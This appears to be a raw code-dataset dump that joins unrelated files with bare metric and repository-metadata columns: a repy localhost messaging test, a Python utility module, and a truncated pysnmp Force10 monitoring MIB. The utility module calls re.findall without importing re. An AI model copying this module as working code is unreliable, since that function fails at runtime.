#pragma out #pragma repy restrictions.loose def foo(ip,port,mess, ch): print ip,port,mess,ch stopcomm(ch) def noop(a,b,c,d): pass if callfunc == 'initialize': ip = getmyip() noopch = recvmess(ip,<messport>,noop) recvmess(ip,<messport1>,foo) sleep(.1) sendmess(ip,<messport1>,'hi',ip,<messport>) stopcomm(noopch)
18.5
45
0.678679
50
333
4.52
0.62
0.053097
0.088496
0.106195
0
0
0
0
0
0
0
0.010563
0.147147
333
17
46
19.588235
0.785211
0.12012
0
0
0
0
0.041237
0
0
0
0
0
0
0
null
null
0.083333
0
null
null
0.083333
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
1
0
0
0
0
0
2
055c91bef8da3c2b5ab9913ec9ae41927e8fef83
1,514
py
Python
evkit/utils/misc.py
joel99/midlevel-reps
f0b4a4d8ccf09a0488cd18af24723172aff99446
[ "MIT" ]
120
2019-04-22T04:45:28.000Z
2022-03-23T01:53:17.000Z
evkit/utils/misc.py
joel99/midlevel-reps
f0b4a4d8ccf09a0488cd18af24723172aff99446
[ "MIT" ]
14
2019-06-12T08:21:21.000Z
2021-08-25T15:36:58.000Z
evkit/utils/misc.py
joel99/midlevel-reps
f0b4a4d8ccf09a0488cd18af24723172aff99446
[ "MIT" ]
19
2019-06-19T07:00:36.000Z
2022-03-24T07:18:30.000Z
import collections import torch import pprint import string remove_whitespace = str.maketrans('', '', string.whitespace) def cfg_to_md(cfg, uuid): ''' Because tensorboard uses markdown''' return uuid + "\n\n " + pprint.pformat((cfg)).replace("\n", " \n").replace("\n \'", "\n \'") + "" def is_interactive(): try: ip = get_ipython() return ip.has_trait('kernel') except: return False def is_cuda(model): return next(model.parameters()).is_cuda class Bunch(object): def __init__(self, adict): self.__dict__.update(adict) self._keys, self._vals = zip(*adict.items()) self._keys, self._vals = list(self._keys), list(self._vals) def keys(self): return self._keys def vals(self): return self._vals def compute_weight_norm(parameters): ''' no grads! ''' total = 0.0 count = 0 for p in parameters: total += torch.sum(p.data**2) # total += p.numel() count += p.numel() return (total / count) def get_number(name): """ use regex to get the first integer in the name if none exists, return -1 """ try: num = int(re.findall("[0-9]+", name)[0]) except: num = -1 return num def update_dict_deepcopy(d, u): # we need a deep dictionary update for k, v in u.items(): if isinstance(v, collections.Mapping): d[k] = update_dict_deepcopy(d.get(k, {}), v) else: d[k] = v return d
22.939394
110
0.579921
204
1,514
4.151961
0.460784
0.03778
0.021251
0.03778
0
0
0
0
0
0
0
0.008212
0.27609
1,514
65
111
23.292308
0.764599
0.112285
0
0.090909
0
0
0.031298
0
0
0
0
0
0
1
0.204545
false
0
0.090909
0.068182
0.522727
0.045455
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
0565ccb5f3f8b36de113f3a2bcbbc32675fef341
58,839
py
Python
pysnmp-with-texts/FORCE10-MONITORING-MIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
8
2019-05-09T17:04:00.000Z
2021-06-09T06:50:51.000Z
pysnmp-with-texts/FORCE10-MONITORING-MIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
4
2019-05-31T16:42:59.000Z
2020-01-31T21:57:17.000Z
pysnmp-with-texts/FORCE10-MONITORING-MIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
10
2019-04-30T05:51:36.000Z
2022-02-16T03:33:41.000Z
# # PySNMP MIB module FORCE10-MONITORING-MIB (http://snmplabs.com/pysmi) # ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/FORCE10-MONITORING-MIB # Produced by pysmi-0.3.4 at Wed May 1 13:14:24 2019 # On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 # Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) # ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") ValueRangeConstraint, ConstraintsIntersection, ConstraintsUnion, ValueSizeConstraint, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsIntersection", "ConstraintsUnion", "ValueSizeConstraint", "SingleValueConstraint") f10Mgmt, = mibBuilder.importSymbols("FORCE10-SMI", "f10Mgmt") F10VlanID, F10CycloneVersion, F10ProcessorModuleType, F10PortPipeID, F10QueueID, F10SlotID = mibBuilder.importSymbols("FORCE10-TC", "F10VlanID", "F10CycloneVersion", "F10ProcessorModuleType", "F10PortPipeID", "F10QueueID", "F10SlotID") ifIndex, = mibBuilder.importSymbols("IF-MIB", "ifIndex") ObjectGroup, ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ObjectGroup", "ModuleCompliance", "NotificationGroup") Gauge32, Counter32, Integer32, iso, MibScalar, MibTable, MibTableRow, MibTableColumn, ModuleIdentity, Bits, IpAddress, TimeTicks, Unsigned32, MibIdentifier, ObjectIdentity, NotificationType, Counter64 = mibBuilder.importSymbols("SNMPv2-SMI", "Gauge32", "Counter32", "Integer32", "iso", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ModuleIdentity", "Bits", "IpAddress", "TimeTicks", "Unsigned32", "MibIdentifier", "ObjectIdentity", "NotificationType", "Counter64") DisplayString, TextualConvention, MacAddress, TruthValue = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention", "MacAddress", "TruthValue") f10MonitoringMib = 
ModuleIdentity((1, 3, 6, 1, 4, 1, 6027, 3, 3)) f10MonitoringMib.setRevisions(('2008-12-18 12:00', '1906-01-20 00:00', '2000-11-02 10:30',)) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): if mibBuilder.loadTexts: f10MonitoringMib.setRevisionsDescriptions(('Force10 Monitoring MIB version 1.3 Added CPU Ingress Queue Unicast Statistics table. ', 'Force10 Monitoring MIB version 1.2 Added IP and ARP statistic objects that are not available in RFC1213. ', 'Force10 Monitoring MIB version 1.1',)) if mibBuilder.loadTexts: f10MonitoringMib.setLastUpdated('200812181200Z') if mibBuilder.loadTexts: f10MonitoringMib.setOrganization('Force10 Networks, Inc.') if mibBuilder.loadTexts: f10MonitoringMib.setContactInfo('Force10 Networks, Inc 1440 McCarthy Blvd Milpitas, CA 95035 (408) 571-3500 support@force10networks.com http://www.force10networks.com') if mibBuilder.loadTexts: f10MonitoringMib.setDescription('Force10 Monitoring MIB provides statistics and accounting for various Force10 products. ') f10MonGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 1)) f10MonQueue = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2)) f10MonMac = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3)) f10MonIfQueue = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4)) f10NetworkStat = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5)) f10IpStatistic = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 1)) f10ArpStatistic = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 2)) f10MonMibVersion = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("version1", 1), ("version1dot1", 2), ("version1dot2", 3)))).setMaxAccess("readonly") if mibBuilder.loadTexts: f10MonMibVersion.setStatus('current') if mibBuilder.loadTexts: f10MonMibVersion.setDescription(' version1(1) - initial version, define QOS Queue Statistics table. version1dot1(2) - support MAC Accounting (f10MonMac). 
version1dot2(3) - support Interface Queue Statistics Tables (f10MonIfQueue). ') f10MonQueueGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 1)) f10MonMaxQueue = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 1, 1), Integer32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10MonMaxQueue.setStatus('current') if mibBuilder.loadTexts: f10MonMaxQueue.setDescription('The maximum number of Force10 QOS queue supported by Force10 Interfaces. ') f10InQueueStatisticsTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2), ) if mibBuilder.loadTexts: f10InQueueStatisticsTable.setStatus('current') if mibBuilder.loadTexts: f10InQueueStatisticsTable.setDescription('The Force10 QOS Input Queue Statistics Table. This table provides Input Queue statistics for Force10 Interfaces. ') f10InQueueStatisticsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "FORCE10-MONITORING-MIB", "f10InQueueId")) if mibBuilder.loadTexts: f10InQueueStatisticsEntry.setStatus('current') if mibBuilder.loadTexts: f10InQueueStatisticsEntry.setDescription('An entry in the Force10 QOS Input Queue table. The Input Queue Statistics Table is indexed by the Interface and the Queue ID. The Interface index should be an valid ifIndex as defined in the RFC1213 MIB II Interface Table and the Queue ID should be a valid Force10 Queue ID. ') f10InQueueId = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 1), F10QueueID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10InQueueId.setStatus('current') if mibBuilder.loadTexts: f10InQueueId.setDescription('This is the second index of this table, it must be a valid Force10 QOS Queue ID. 
') f10InQueueDropPackets = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 2), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10InQueueDropPackets.setStatus('current') if mibBuilder.loadTexts: f10InQueueDropPackets.setDescription(' ') f10InQueueBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 3), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10InQueueBytes.setStatus('current') if mibBuilder.loadTexts: f10InQueueBytes.setDescription(' ') f10InQueueMatchPackets = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 4), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10InQueueMatchPackets.setStatus('current') if mibBuilder.loadTexts: f10InQueueMatchPackets.setDescription(' ') f10InQueueMatchBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 5), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10InQueueMatchBytes.setStatus('current') if mibBuilder.loadTexts: f10InQueueMatchBytes.setDescription(' ') f10InQueueMatchBps = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 6), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10InQueueMatchBps.setStatus('current') if mibBuilder.loadTexts: f10InQueueMatchBps.setDescription(' ') f10InQueueCycloneVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 7), F10CycloneVersion()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10InQueueCycloneVersion.setStatus('current') if mibBuilder.loadTexts: f10InQueueCycloneVersion.setDescription('The linecard Cyclone hardware version. ') f10InQueueBytesCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 8), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10InQueueBytesCount.setStatus('current') if mibBuilder.loadTexts: f10InQueueBytesCount.setDescription('The cumulative number of bytes data passing through this queue. This object is available on Cyclone version 2.0 (C2T2) hardware only. 
') f10InQueuePktsCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 9), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10InQueuePktsCount.setStatus('current') if mibBuilder.loadTexts: f10InQueuePktsCount.setDescription('The cumulative number of packets passing through this queue. This object is available on Cyclone version 2.0 (C2T2) hardware only. ') f10OutQueueStatisticsTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 3), ) if mibBuilder.loadTexts: f10OutQueueStatisticsTable.setStatus('current') if mibBuilder.loadTexts: f10OutQueueStatisticsTable.setDescription('The Force10 QOS Output Queue Statistics Table. This table provides Output Queue statistics for Force10 Interfaces. ') f10OutQueueStatisticsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 3, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "FORCE10-MONITORING-MIB", "f10OutQueueId")) if mibBuilder.loadTexts: f10OutQueueStatisticsEntry.setStatus('current') if mibBuilder.loadTexts: f10OutQueueStatisticsEntry.setDescription('An entry in the Output Queue table. The Output Queue Statistics Table is indexed by the Interface and the Queue ID. The Interface index should be an valid ifIndex as defined in the RFC1213 MIB II Interface Table and the the Queue ID should be a valid Force10 Queue ID. ') f10OutQueueId = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 3, 1, 1), F10QueueID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10OutQueueId.setStatus('current') if mibBuilder.loadTexts: f10OutQueueId.setDescription('This is the second index of this table, it must be a valid Force10 QOS Queue ID. 
') f10OutQueuePackets = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 3, 1, 2), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10OutQueuePackets.setStatus('current') if mibBuilder.loadTexts: f10OutQueuePackets.setDescription(' ') f10OutQueueBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 3, 1, 3), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10OutQueueBytes.setStatus('current') if mibBuilder.loadTexts: f10OutQueueBytes.setDescription('The number of bytes in the queue. This object is available on Cyclone version 1.5 (CjTj) hardware only. ') f10OutQueueBps = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 3, 1, 4), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10OutQueueBps.setStatus('current') if mibBuilder.loadTexts: f10OutQueueBps.setDescription(' ') f10OutQueueCycloneVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 3, 1, 5), F10CycloneVersion()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10OutQueueCycloneVersion.setStatus('current') if mibBuilder.loadTexts: f10OutQueueCycloneVersion.setDescription('The linecard Cyclone hardware version. ') f10OutQueueBytesCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 3, 1, 6), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10OutQueueBytesCount.setStatus('current') if mibBuilder.loadTexts: f10OutQueueBytesCount.setDescription('The cumulative number of bytes data passing through this queue. This object is available on Cyclone version 2.0 (C2T2) hardware only. ') f10WredStatisticsTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4), ) if mibBuilder.loadTexts: f10WredStatisticsTable.setStatus('current') if mibBuilder.loadTexts: f10WredStatisticsTable.setDescription('QOS WRED Statistics Table This table provides QOS WRED statistics for the Force10 Interfaces. 
') f10WredStatisticsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "FORCE10-MONITORING-MIB", "f10WredQueueId")) if mibBuilder.loadTexts: f10WredStatisticsEntry.setStatus('current') if mibBuilder.loadTexts: f10WredStatisticsEntry.setDescription('An entry in the WRED Statistics table. The WRED Statistics Table is indexed by the Interface and the Queue ID. The Interface index should be an valid ifIndex as defined in the RFC1213 MIB II Interface Table and the Queue ID should be a valid Force10 Queue ID. ') f10WredQueueId = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 1), F10QueueID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredQueueId.setStatus('current') if mibBuilder.loadTexts: f10WredQueueId.setDescription('This is the second index of this table, it must be a valid Force10 QOS Queue ID. ') f10WredGreenName = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 2), DisplayString()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredGreenName.setStatus('current') if mibBuilder.loadTexts: f10WredGreenName.setDescription(' ') f10WredGreenThresholdLow = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 3), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredGreenThresholdLow.setStatus('current') if mibBuilder.loadTexts: f10WredGreenThresholdLow.setDescription(' ') f10WredGreenThresholdHigh = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 4), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredGreenThresholdHigh.setStatus('current') if mibBuilder.loadTexts: f10WredGreenThresholdHigh.setDescription(' ') f10WredGreenDropPackets = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 5), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredGreenDropPackets.setStatus('current') if mibBuilder.loadTexts: f10WredGreenDropPackets.setDescription(' ') f10WredGreenReserve1 = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 
4, 1, 6), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredGreenReserve1.setStatus('current') if mibBuilder.loadTexts: f10WredGreenReserve1.setDescription(' ') f10WredGreenReserve2 = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 7), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredGreenReserve2.setStatus('current') if mibBuilder.loadTexts: f10WredGreenReserve2.setDescription(' ') f10WredYellowName = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 8), DisplayString()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredYellowName.setStatus('current') if mibBuilder.loadTexts: f10WredYellowName.setDescription(' ') f10WredYellowThresholdLow = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 9), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredYellowThresholdLow.setStatus('current') if mibBuilder.loadTexts: f10WredYellowThresholdLow.setDescription(' ') f10WredYellowThresholdHigh = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 10), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredYellowThresholdHigh.setStatus('current') if mibBuilder.loadTexts: f10WredYellowThresholdHigh.setDescription(' ') f10WredYellowDropPackets = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 11), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredYellowDropPackets.setStatus('current') if mibBuilder.loadTexts: f10WredYellowDropPackets.setDescription(' ') f10WredYellowReserve1 = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 12), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredYellowReserve1.setStatus('current') if mibBuilder.loadTexts: f10WredYellowReserve1.setDescription(' ') f10WredYellowReserve2 = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 13), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredYellowReserve2.setStatus('current') if mibBuilder.loadTexts: 
f10WredYellowReserve2.setDescription(' ') f10WredRedName = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 14), DisplayString()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredRedName.setStatus('current') if mibBuilder.loadTexts: f10WredRedName.setDescription(' ') f10WredRedThresholdLow = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 15), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredRedThresholdLow.setStatus('current') if mibBuilder.loadTexts: f10WredRedThresholdLow.setDescription(' ') f10WredRedThresholdHigh = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 16), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredRedThresholdHigh.setStatus('current') if mibBuilder.loadTexts: f10WredRedThresholdHigh.setDescription(' ') f10WredRedDropPackets = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 17), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredRedDropPackets.setStatus('current') if mibBuilder.loadTexts: f10WredRedDropPackets.setDescription(' ') f10WredRedReserve1 = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 18), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredRedReserve1.setStatus('current') if mibBuilder.loadTexts: f10WredRedReserve1.setDescription(' ') f10WredRedReserve2 = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 19), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredRedReserve2.setStatus('current') if mibBuilder.loadTexts: f10WredRedReserve2.setDescription(' ') f10MacGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 1)) f10MacAccounting = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2)) f10MacAccountingDestTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2, 1), ) if mibBuilder.loadTexts: f10MacAccountingDestTable.setStatus('current') if mibBuilder.loadTexts: f10MacAccountingDestTable.setDescription('The MAC Accounting Destination Table. 
Each entry in the table provides the MAC accounting statistics from a specific Interface, VLAN ID, and the desired destination MAC Address. ') f10MacAccountingDestEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2, 1, 1), ).setIndexNames((0, "FORCE10-MONITORING-MIB", "f10MacAccInIfIndex"), (0, "FORCE10-MONITORING-MIB", "f10MacAccVlan"), (0, "FORCE10-MONITORING-MIB", "f10MacAccMacAddr")) if mibBuilder.loadTexts: f10MacAccountingDestEntry.setStatus('current') if mibBuilder.loadTexts: f10MacAccountingDestEntry.setDescription('An entry in the MAC Accounting Destination Table. The MAC Accounting Destination table is indexed by the input Interface, VLAN ID, and the destination MAC Address. ') f10MacAccInIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2, 1, 1, 1), Integer32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10MacAccInIfIndex.setStatus('current') if mibBuilder.loadTexts: f10MacAccInIfIndex.setDescription('The input Interface of this entry of the table. The value should be a valid ifIndex in the MIB II Interface Table. ') f10MacAccVlan = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2, 1, 1, 2), F10VlanID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10MacAccVlan.setStatus('current') if mibBuilder.loadTexts: f10MacAccVlan.setDescription('The VLAN ID. ') f10MacAccMacAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2, 1, 1, 3), MacAddress()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10MacAccMacAddr.setStatus('current') if mibBuilder.loadTexts: f10MacAccMacAddr.setDescription("The MAC Address that identifies this entry of the table. This is the destination MAC Address of the packets that's going through the Interface identified by f10MacAccInIfIndex. 
") f10MacAccOutIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2, 1, 1, 4), Integer32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10MacAccOutIfIndex.setStatus('current') if mibBuilder.loadTexts: f10MacAccOutIfIndex.setDescription('The output Interface of this entry of the table. The value should be a valid ifIndex in the MIB II Interface Table. ') f10MacAccPackets = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2, 1, 1, 5), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10MacAccPackets.setStatus('current') if mibBuilder.loadTexts: f10MacAccPackets.setDescription('The number of packets going through this entry of the the table, identified by the Interface/MAC/VLAN. ') f10MacAccBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2, 1, 1, 6), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10MacAccBytes.setStatus('current') if mibBuilder.loadTexts: f10MacAccBytes.setDescription('The number of bytes traffic going through this entry of the table, identified by the Interface/MAC/VLAN. ') f10MonIfQueueGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 1)) f10IngQueueUnicastStatTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2), ) if mibBuilder.loadTexts: f10IngQueueUnicastStatTable.setStatus('current') if mibBuilder.loadTexts: f10IngQueueUnicastStatTable.setDescription('The Ingress Queue Unicast Statistics Table. This table provides Queue statistics for Ingress Unicast packets between Force10 linecards. 
') f10IngQueueUnicastStatEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1), ).setIndexNames((0, "FORCE10-MONITORING-MIB", "f10IngUnicastSrcCard"), (0, "FORCE10-MONITORING-MIB", "f10IngUnicastDestCard"), (0, "FORCE10-MONITORING-MIB", "f10IngUnicastSrcPortPipe"), (0, "FORCE10-MONITORING-MIB", "f10IngUnicastDestPortPipe"), (0, "FORCE10-MONITORING-MIB", "f10IngUnicastQueueId")) if mibBuilder.loadTexts: f10IngQueueUnicastStatEntry.setStatus('current') if mibBuilder.loadTexts: f10IngQueueUnicastStatEntry.setDescription('An entry in the Ingress Queue Unicast Statistics table. The Ingress Queue Unicast Statistics Table is indexed by the source and destination linecard/portpipe and Queue ID. ') f10IngUnicastSrcCard = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 1), F10SlotID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastSrcCard.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastSrcCard.setDescription('This is the source linecard number. This is the first index of this table entry. ') f10IngUnicastDestCard = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 2), F10SlotID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastDestCard.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastDestCard.setDescription('This is the destination linecard number. This is the 3rd index of this table entry. ') f10IngUnicastSrcPortPipe = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 3), F10PortPipeID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastSrcPortPipe.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastSrcPortPipe.setDescription('This is the Force10 Cyclone PortPipe number of the source linecard. This is the 2nd index of this table entry. 
') f10IngUnicastDestPortPipe = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 4), F10PortPipeID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastDestPortPipe.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastDestPortPipe.setDescription('This is the Force10 Cyclone PortPipe number of the destination linecard. This is the 4th index of this table entry. ') f10IngUnicastQueueId = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 5), F10QueueID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastQueueId.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastQueueId.setDescription('This is the Queue ID of this entry. This is the 5th index of this table entry. ') f10IngUnicastCycloneVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 6), F10CycloneVersion()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastCycloneVersion.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastCycloneVersion.setDescription('The linecard Cyclone hardware version. ') f10IngUnicastBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 7), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastBytes.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastBytes.setDescription('The number of bytes in the queue. This object is available on Cyclone version 1.5 (CjTj) hardware only. ') f10IngUnicastBytesCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 8), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastBytesCount.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastBytesCount.setDescription('The cumulative number of bytes data passing through this queue. This object is available on Cyclone version 2.0 (C2T2) and Cyclone version 3.0 (X3) hardwares only. 
